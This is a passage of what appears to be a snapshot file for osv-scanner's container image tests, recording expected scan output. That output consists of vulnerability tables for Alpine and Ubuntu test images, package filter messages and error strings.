"alpine:3.18.9" --- [TestCommand_Docker/real_alpine_image_without_apk_extractor_enabled - 2] No package sources found, --help for usage information. --- [TestCommand_Docker/real_empty_image_with_tag_and_allow_no_lockfiles_flag - 1] Checking if docker image ("hello-world:linux") exists locally... Saving docker image ("hello-world:linux") to temporary file... Scanning image "hello-world:linux" No package sources found No issues found --- [TestCommand_Docker/real_empty_image_with_tag_and_allow_no_lockfiles_flag - 2] --- [TestCommand_ExplicitExtractors_WithDefaults/add_extractors - 1] Scanning local image tarball "testdata/test-alpine-sbom.tar" Container Scanning Result (Alpine Linux v3.10) (Based on "alpine" image): Total 2 packages affected by 4 known vulnerabilities (2 Critical, 1 High, 1 Medium, 0 Low, 0 Unknown) from 2 ecosystems. 1 vulnerability can be fixed. Alpine +------------------------------------------------------------------------------------------------+ | Source:sbom:/data/alpine-zlib-16.cdx.json:lib/apk/db/installed | +---------+-------------------+------------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +---------+-------------------+------------------+------------+------------------+---------------+ | zlib | 1.2.12-r1 | No fix available | 3 | # 2 Layer | -- | +---------+-------------------+------------------+------------+------------------+---------------+ Alpine:v3.10 +------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/lib/apk/db/installed | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | apk-tools | 2.10.6-r0 | Fix Available | 1 | apk-tools | # 0 Layer | alpine | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_ExplicitExtractors_WithDefaults/add_extractors - 2] --- [TestCommand_ExplicitExtractors_WithDefaults/extractors_cancelled_out - 1] Scanning local image tarball "testdata/test-alpine-sbom.tar" Container Scanning Result (Alpine Linux v3.10) (Based on "alpine" image): Total 1 package affected by 1 known vulnerability (1 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 1 vulnerability can be fixed. Alpine:v3.10 +------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/lib/apk/db/installed | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | apk-tools | 2.10.6-r0 | Fix Available | 1 | apk-tools | # 0 Layer | alpine | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_ExplicitExtractors_WithDefaults/extractors_cancelled_out - 2] --- [TestCommand_ExplicitExtractors_WithDefaults/extractors_cancelled_out#01 - 1] Scanning local image tarball "testdata/test-alpine-sbom.tar" Container Scanning Result (Alpine Linux v3.10) (Based on "alpine" image): Total 1 package affected by 1 known vulnerability (1 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 1 vulnerability can be fixed. Alpine:v3.10 +------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/lib/apk/db/installed | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | apk-tools | 2.10.6-r0 | Fix Available | 1 | apk-tools | # 0 Layer | alpine | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_ExplicitExtractors_WithDefaults/extractors_cancelled_out#01 - 2] --- [TestCommand_ExplicitExtractors_WithDefaults/extractors_cancelled_out_with_presets - 1] Scanning local image tarball "testdata/test-alpine-sbom.tar" Container Scanning Result (Alpine Linux v3.10) (Based on "alpine" image): Total 1 package affected by 1 known vulnerability (1 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 1 vulnerability can be fixed. Alpine:v3.10 +------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/lib/apk/db/installed | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | apk-tools | 2.10.6-r0 | Fix Available | 1 | apk-tools | # 0 Layer | alpine | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_ExplicitExtractors_WithDefaults/extractors_cancelled_out_with_presets - 2] --- [TestCommand_ExplicitExtractors_WithoutDefaults/add_extractors - 1] Scanning local image tarball "testdata/test-alpine-sbom.tar" Total 1 package affected by 3 known vulnerabilities (1 Critical, 1 High, 1 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +---------------------------------------+------+-----------+---------+-----------+---------------+---------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +---------------------------------------+------+-----------+---------+-----------+---------------+---------------------------------------------------+ | https://osv.dev/ALPINE-CVE-2022-37434 | 9.8 | Alpine | zlib | 1.2.12-r1 | -- | data/alpine-zlib-16.cdx.json:lib/apk/db/installed | | https://osv.dev/ALPINE-CVE-2026-22184 | 7.8 | Alpine | zlib | 1.2.12-r1 | -- | data/alpine-zlib-16.cdx.json:lib/apk/db/installed | | https://osv.dev/ALPINE-CVE-2026-27171 | 5.5 | Alpine | zlib | 1.2.12-r1 | -- | data/alpine-zlib-16.cdx.json:lib/apk/db/installed | +---------------------------------------+------+-----------+---------+-----------+---------------+---------------------------------------------------+ --- [TestCommand_ExplicitExtractors_WithoutDefaults/add_extractors - 2] --- [TestCommand_ExplicitExtractors_WithoutDefaults/extractors_cancelled_out - 1] --- [TestCommand_ExplicitExtractors_WithoutDefaults/extractors_cancelled_out - 2] at least one extractor must be enabled --- [TestCommand_ExplicitExtractors_WithoutDefaults/extractors_cancelled_out#01 - 1] --- [TestCommand_ExplicitExtractors_WithoutDefaults/extractors_cancelled_out#01 - 2] at least one extractor must be enabled --- [TestCommand_ExplicitExtractors_WithoutDefaults/extractors_cancelled_out_with_presets - 1] --- [TestCommand_ExplicitExtractors_WithoutDefaults/extractors_cancelled_out_with_presets - 2] at least one extractor must be enabled --- [TestCommand_HtmlFile - 1] Scanning local image tarball "./testdata/test-alpine.tar" HTML output available at: /report.html --- [TestCommand_OCIImage/Alpine_3.10_image_tar_with_3.18_version_file - 1] Scanning local image tarball "./testdata/test-alpine.tar" Container Scanning Result (Alpine Linux v3.18) (Based on "alpine" image): Total 5 packages affected by 65 known vulnerabilities (6 Critical, 33 High, 26 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 65 vulnerabilities can be fixed. Alpine:v3.18 +------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/lib/apk/db/installed | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | apk-tools | 2.10.6-r0 | Fix Available | 2 | apk-tools | # 3 Layer | -- | | busybox | 1.30.1-r5 | Fix Available | 19 | busybox, ssl_client | # 3 Layer | -- | | musl | 1.1.22-r4 | Fix Available | 3 | musl, musl-utils | # 3 Layer | -- | | openssl | 1.1.1k-r0 | Fix Available | 39 | libcrypto1.1... (2) | # 3 Layer | -- | | zlib | 1.2.11-r1 | Fix Available | 2 | zlib | # 3 Layer | -- | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_OCIImage/Alpine_3.10_image_tar_with_3.18_version_file - 2] --- [TestCommand_OCIImage/Empty_Ubuntu_20.04_image_tar_with_no_vulns_shown - 1] Scanning local image tarball "./testdata/test-ubuntu-20-04.tar" Package Ubuntu:20.04/util-linux/1:2.34-0.1ubuntu9.6 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/coreutils/8.30-3ubuntu2 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/dpkg/1.19.7ubuntu3.2 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/util-linux/2.34-0.1ubuntu9.6 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/gcc-10/10.5.0-1ubuntu1~20.04 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/gnupg2/2.2.19-3ubuntu2.4 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/util-linux/2.34-0.1ubuntu9.6 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/glibc/2.31-0ubuntu9.17 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/glibc/2.31-0ubuntu9.17 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/util-linux/2.34-0.1ubuntu9.6 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/gcc-10/10.5.0-1ubuntu1~20.04 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/libgcrypt20/1.8.5-5ubuntu1.1 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/gnutls28/3.6.13-2ubuntu1.12 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/lz4/1.9.2-2ubuntu0.20.04.1 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/util-linux/2.34-0.1ubuntu9.6 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/ncurses/6.2-0ubuntu2.1 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/ncurses/6.2-0ubuntu2.1 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/pam/1.3.1-5ubuntu4.7 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/pam/1.3.1-5ubuntu4.7 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/pam/1.3.1-5ubuntu4.7 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/pam/1.3.1-5ubuntu4.7 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/pcre2/10.34-7ubuntu0.1 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/util-linux/2.34-0.1ubuntu9.6 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/gcc-10/10.5.0-1ubuntu1~20.04 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/systemd/245.4-4ubuntu3.24 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/libtasn1-6/4.16.0-2ubuntu0.1 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/ncurses/6.2-0ubuntu2.1 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/systemd/245.4-4ubuntu3.24 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/util-linux/2.34-0.1ubuntu9.6 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/shadow/1:4.8.1-1ubuntu5.20.04.5 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/util-linux/2.34-0.1ubuntu9.6 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/ncurses/6.2-0ubuntu2.1 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/ncurses/6.2-0ubuntu2.1 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/shadow/1:4.8.1-1ubuntu5.20.04.5 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/perl/5.30.0-9ubuntu0.5 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/tar/1.30+dfsg-7ubuntu0.20.04.4 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/util-linux/2.34-0.1ubuntu9.6 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/zlib/1:1.2.11.dfsg-2ubuntu1.5 has been filtered out because: Just want to test only unimportant vulns Filtered 38 ignored package/s from the scan. Container Scanning Result (Ubuntu 20.04.6 LTS) (Based on "ubuntu" image): Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. Hiding 1 number of vulnerabilities deemed unimportant, use --all-vulns to show them. For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_OCIImage/Empty_Ubuntu_20.04_image_tar_with_no_vulns_shown - 2] --- [TestCommand_OCIImage/Empty_Ubuntu_20.04_image_tar_with_only_unimportant_vulns_shown - 1] Scanning local image tarball "./testdata/test-ubuntu-20-04.tar" Package Ubuntu:20.04/util-linux/1:2.34-0.1ubuntu9.6 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/coreutils/8.30-3ubuntu2 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/dpkg/1.19.7ubuntu3.2 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/util-linux/2.34-0.1ubuntu9.6 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/gcc-10/10.5.0-1ubuntu1~20.04 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/gnupg2/2.2.19-3ubuntu2.4 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/util-linux/2.34-0.1ubuntu9.6 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/glibc/2.31-0ubuntu9.17 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/glibc/2.31-0ubuntu9.17 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/util-linux/2.34-0.1ubuntu9.6 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/gcc-10/10.5.0-1ubuntu1~20.04 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/libgcrypt20/1.8.5-5ubuntu1.1 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/gnutls28/3.6.13-2ubuntu1.12 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/lz4/1.9.2-2ubuntu0.20.04.1 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/util-linux/2.34-0.1ubuntu9.6 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/ncurses/6.2-0ubuntu2.1 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/ncurses/6.2-0ubuntu2.1 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/pam/1.3.1-5ubuntu4.7 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/pam/1.3.1-5ubuntu4.7 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/pam/1.3.1-5ubuntu4.7 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/pam/1.3.1-5ubuntu4.7 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/pcre2/10.34-7ubuntu0.1 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/util-linux/2.34-0.1ubuntu9.6 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/gcc-10/10.5.0-1ubuntu1~20.04 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/systemd/245.4-4ubuntu3.24 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/libtasn1-6/4.16.0-2ubuntu0.1 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/ncurses/6.2-0ubuntu2.1 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/systemd/245.4-4ubuntu3.24 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/util-linux/2.34-0.1ubuntu9.6 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/shadow/1:4.8.1-1ubuntu5.20.04.5 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/util-linux/2.34-0.1ubuntu9.6 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/ncurses/6.2-0ubuntu2.1 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/ncurses/6.2-0ubuntu2.1 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/shadow/1:4.8.1-1ubuntu5.20.04.5 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/perl/5.30.0-9ubuntu0.5 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/tar/1.30+dfsg-7ubuntu0.20.04.4 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/util-linux/2.34-0.1ubuntu9.6 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/zlib/1:1.2.11.dfsg-2ubuntu1.5 has been filtered out because: Just want to test only unimportant vulns Filtered 38 ignored package/s from the scan. Container Scanning Result (Ubuntu 20.04.6 LTS) (Based on "ubuntu" image): Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. Filtered Vulnerabilities: +---------+--------------+--------------------+---------------------+----------------+ | PACKAGE | ECOSYSTEM | INSTALLED VERSION | FILTERED VULN COUNT | FILTER REASONS | +---------+--------------+--------------------+---------------------+----------------+ | pcre3 | Ubuntu:20.04 | 2:8.39-12ubuntu0.1 | 1 | Unimportant | +---------+--------------+--------------------+---------------------+----------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_OCIImage/Empty_Ubuntu_20.04_image_tar_with_only_unimportant_vulns_shown - 2] --- [TestCommand_OCIImage/Empty_Ubuntu_22.04_image_tar - 1] Scanning local image tarball "./testdata/test-ubuntu.tar" Container Scanning Result (Ubuntu 22.04.5 LTS) (Based on "ubuntu" image): Total 22 packages affected by 48 known vulnerabilities (3 Critical, 14 High, 25 Medium, 3 Low, 3 Unknown) from 1 ecosystem. 24 vulnerabilities can be fixed. Ubuntu:22.04 +---------------------------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/var/lib/dpkg/status | +----------------+------------------------------+-------------------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+------------------------------+-------------------------+------------+-------------------------+------------------+---------------+ | coreutils | 8.32-4.1ubuntu1.2 | No fix available | 2 | coreutils | # 4 Layer | ubuntu | | dpkg | 1.21.1ubuntu2.3 | Partial fixes Available | 2 | dpkg | # 4 Layer | ubuntu | | gcc-12 | 12.3.0-1ubuntu1~22.04 | Partial fixes Available | 2 | gcc-12-base... (3) | # 4 Layer | ubuntu | | glibc | 2.35-0ubuntu3.8 | Fix Available | 3 | libc-bin, libc6 | # 4 Layer | ubuntu | | gnupg2 | 2.2.27-3ubuntu2.1 | Partial fixes Available | 5 | gpgv | # 4 Layer | ubuntu | | gnutls28 | 3.7.3-4ubuntu1.5 | Fix Available | 3 | libgnutls30 | # 4 Layer | ubuntu | | krb5 | 1.19.2-2ubuntu0.4 | Fix Available | 2 | libgssapi-krb5-2... (4) | # 4 Layer | ubuntu | | libcap2 | 1:2.44-1ubuntu0.22.04.1 | Fix Available | 1 | libcap2 | # 4 Layer | ubuntu | | libgcrypt20 | 1.9.4-3ubuntu3 | No fix available | 1 | libgcrypt20 | # 4 Layer | ubuntu | | libtasn1-6 | 4.18.0-4build1 | Fix Available | 2 | libtasn1-6 | # 4 Layer | ubuntu | | libzstd | 1.4.8+dfsg-3build1 | No fix available | 1 | libzstd1 | # 4 Layer | ubuntu | | lz4 | 1.9.3-2build2 | No fix available | 1 | liblz4-1 | # 4 Layer | ubuntu | | ncurses | 6.3-2ubuntu0.1 | No fix available | 2 | libncurses6... (5) | # 4 Layer | ubuntu | | openssl | 3.0.2-0ubuntu1.18 | Partial fixes Available | 6 | libssl3 | # 4 Layer | ubuntu | | pam | 1.4.0-11ubuntu2.5 | Partial fixes Available | 3 | libpam-modules... (4) | # 4 Layer | ubuntu | | pcre2 | 10.39-3ubuntu0.1 | No fix available | 1 | libpcre2-8-0 | # 4 Layer | ubuntu | | perl | 5.34.0-3ubuntu1.3 | Partial fixes Available | 3 | perl-base | # 4 Layer | ubuntu | | shadow | 1:4.8.1-2ubuntu2.2 | No fix available | 2 | login, passwd | # 4 Layer | ubuntu | | systemd | 249.11-0ubuntu3.12 | Partial fixes Available | 3 | libsystemd0... (2) | # 4 Layer | ubuntu | | tar | 1.34+dfsg-1ubuntu0.1.22.04.2 | No fix available | 1 | tar | # 4 Layer | ubuntu | | util-linux | 2.37.2-4ubuntu3.4 | Fix Available | 1 | libblkid1... (6) | # 4 Layer | ubuntu | | zlib | 1:1.2.11.dfsg-2ubuntu9.2 | No fix available | 1 | zlib1g | # 4 Layer | ubuntu | +----------------+------------------------------+-------------------------+------------+-------------------------+------------------+---------------+ Hiding 5 number of vulnerabilities deemed unimportant, use --all-vulns to show them. For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_OCIImage/Empty_Ubuntu_22.04_image_tar - 2] --- [TestCommand_OCIImage/Empty_Ubuntu_22.04_image_tar_with_unimportant_vulns - 1] Scanning local image tarball "./testdata/test-ubuntu.tar" Container Scanning Result (Ubuntu 22.04.5 LTS) (Based on "ubuntu" image): Total 22 packages affected by 48 known vulnerabilities (3 Critical, 14 High, 25 Medium, 3 Low, 3 Unknown) from 1 ecosystem. 24 vulnerabilities can be fixed. Ubuntu:22.04 +---------------------------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/var/lib/dpkg/status | +----------------+------------------------------+-------------------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+------------------------------+-------------------------+------------+-------------------------+------------------+---------------+ | coreutils | 8.32-4.1ubuntu1.2 | No fix available | 2 | coreutils | # 4 Layer | ubuntu | | dpkg | 1.21.1ubuntu2.3 | Partial fixes Available | 2 | dpkg | # 4 Layer | ubuntu | | gcc-12 | 12.3.0-1ubuntu1~22.04 | Partial fixes Available | 2 | gcc-12-base... (3) | # 4 Layer | ubuntu | | glibc | 2.35-0ubuntu3.8 | Fix Available | 3 | libc-bin, libc6 | # 4 Layer | ubuntu | | gnupg2 | 2.2.27-3ubuntu2.1 | Partial fixes Available | 5 | gpgv | # 4 Layer | ubuntu | | gnutls28 | 3.7.3-4ubuntu1.5 | Fix Available | 3 | libgnutls30 | # 4 Layer | ubuntu | | krb5 | 1.19.2-2ubuntu0.4 | Fix Available | 2 | libgssapi-krb5-2... (4) | # 4 Layer | ubuntu | | libcap2 | 1:2.44-1ubuntu0.22.04.1 | Fix Available | 1 | libcap2 | # 4 Layer | ubuntu | | libgcrypt20 | 1.9.4-3ubuntu3 | No fix available | 1 | libgcrypt20 | # 4 Layer | ubuntu | | libtasn1-6 | 4.18.0-4build1 | Fix Available | 2 | libtasn1-6 | # 4 Layer | ubuntu | | libzstd | 1.4.8+dfsg-3build1 | No fix available | 1 | libzstd1 | # 4 Layer | ubuntu | | lz4 | 1.9.3-2build2 | No fix available | 1 | liblz4-1 | # 4 Layer | ubuntu | | ncurses | 6.3-2ubuntu0.1 | No fix available | 2 | libncurses6... (5) | # 4 Layer | ubuntu | | openssl | 3.0.2-0ubuntu1.18 | Partial fixes Available | 6 | libssl3 | # 4 Layer | ubuntu | | pam | 1.4.0-11ubuntu2.5 | Partial fixes Available | 3 | libpam-modules... (4) | # 4 Layer | ubuntu | | pcre2 | 10.39-3ubuntu0.1 | No fix available | 1 | libpcre2-8-0 | # 4 Layer | ubuntu | | perl | 5.34.0-3ubuntu1.3 | Partial fixes Available | 3 | perl-base | # 4 Layer | ubuntu | | shadow | 1:4.8.1-2ubuntu2.2 | No fix available | 2 | login, passwd | # 4 Layer | ubuntu | | systemd | 249.11-0ubuntu3.12 | Partial fixes Available | 3 | libsystemd0... (2) | # 4 Layer | ubuntu | | tar | 1.34+dfsg-1ubuntu0.1.22.04.2 | No fix available | 1 | tar | # 4 Layer | ubuntu | | util-linux | 2.37.2-4ubuntu3.4 | Fix Available | 1 | libblkid1... (6) | # 4 Layer | ubuntu | | zlib | 1:1.2.11.dfsg-2ubuntu9.2 | No fix available | 1 | zlib1g | # 4 Layer | ubuntu | +----------------+------------------------------+-------------------------+------------+-------------------------+------------------+---------------+ Filtered Vulnerabilities: +---------+--------------+--------------------------+---------------------+----------------+ | PACKAGE | ECOSYSTEM | INSTALLED VERSION | FILTERED VULN COUNT | FILTER REASONS | +---------+--------------+--------------------------+---------------------+----------------+ | glibc | Ubuntu:22.04 | 2.35-0ubuntu3.8 | 1 | Unimportant | | krb5 | Ubuntu:22.04 | 1.19.2-2ubuntu0.4 | 2 | Unimportant | | pcre3 | Ubuntu:22.04 | 2:8.39-13ubuntu0.22.04.1 | 1 | Unimportant | | perl | Ubuntu:22.04 | 5.34.0-3ubuntu1.3 | 1 | Unimportant | +---------+--------------+--------------------------+---------------------+----------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_OCIImage/Empty_Ubuntu_22.04_image_tar_with_unimportant_vulns - 2] --- [TestCommand_OCIImage/Invalid_path - 1] Scanning local image tarball "../../testdata/locks-manyoci-image/no-file-here.tar" --- [TestCommand_OCIImage/Invalid_path - 2] failed to load image from tarball with path "../../testdata/locks-manyoci-image/no-file-here.tar": open ../../testdata/locks-manyoci-image/no-file-here.tar: no such file or directory --- [TestCommand_OCIImage/Scanning_Ubuntu_image_with_go_OS_packages_json - 1] Scanning local image tarball "./testdata/test-ubuntu-with-packages.tar" Container Scanning Result (Ubuntu 22.04.5 LTS) (Based on "ubuntu" image): Total 22 packages affected by 48 known vulnerabilities (3 Critical, 14 High, 25 Medium, 3 Low, 3 Unknown) from 1 ecosystem. 24 vulnerabilities can be fixed. Ubuntu:22.04 +---------------------------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/var/lib/dpkg/status | +----------------+------------------------------+-------------------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+------------------------------+-------------------------+------------+-------------------------+------------------+---------------+ | coreutils | 8.32-4.1ubuntu1.2 | No fix available | 2 | coreutils | # 4 Layer | ubuntu | | dpkg | 1.21.1ubuntu2.3 | Partial fixes Available | 2 | dpkg | # 4 Layer | ubuntu | | gcc-12 | 12.3.0-1ubuntu1~22.04 | Partial fixes Available | 2 | gcc-12-base... (3) | # 4 Layer | ubuntu | | glibc | 2.35-0ubuntu3.8 | Fix Available | 3 | libc-bin, libc6 | # 4 Layer | ubuntu | | gnupg2 | 2.2.27-3ubuntu2.1 | Partial fixes Available | 5 | gpgv | # 4 Layer | ubuntu | | gnutls28 | 3.7.3-4ubuntu1.5 | Fix Available | 3 | libgnutls30 | # 4 Layer | ubuntu | | krb5 | 1.19.2-2ubuntu0.4 | Fix Available | 2 | libgssapi-krb5-2... (4) | # 4 Layer | ubuntu | | libcap2 | 1:2.44-1ubuntu0.22.04.1 | Fix Available | 1 | libcap2 | # 4 Layer | ubuntu | | libgcrypt20 | 1.9.4-3ubuntu3 | No fix available | 1 | libgcrypt20 | # 4 Layer | ubuntu | | libtasn1-6 | 4.18.0-4build1 | Fix Available | 2 | libtasn1-6 | # 4 Layer | ubuntu | | libzstd | 1.4.8+dfsg-3build1 | No fix available | 1 | libzstd1 | # 4 Layer | ubuntu | | lz4 | 1.9.3-2build2 | No fix available | 1 | liblz4-1 | # 4 Layer | ubuntu | | ncurses | 6.3-2ubuntu0.1 | No fix available | 2 | libncurses6... (5) | # 4 Layer | ubuntu | | openssl | 3.0.2-0ubuntu1.18 | Partial fixes Available | 6 | libssl3 | # 4 Layer | ubuntu | | pam | 1.4.0-11ubuntu2.5 | Partial fixes Available | 3 | libpam-modules... (4) | # 4 Layer | ubuntu | | pcre2 | 10.39-3ubuntu0.1 | No fix available | 1 | libpcre2-8-0 | # 4 Layer | ubuntu | | perl | 5.34.0-3ubuntu1.3 | Partial fixes Available | 3 | perl-base | # 4 Layer | ubuntu | | 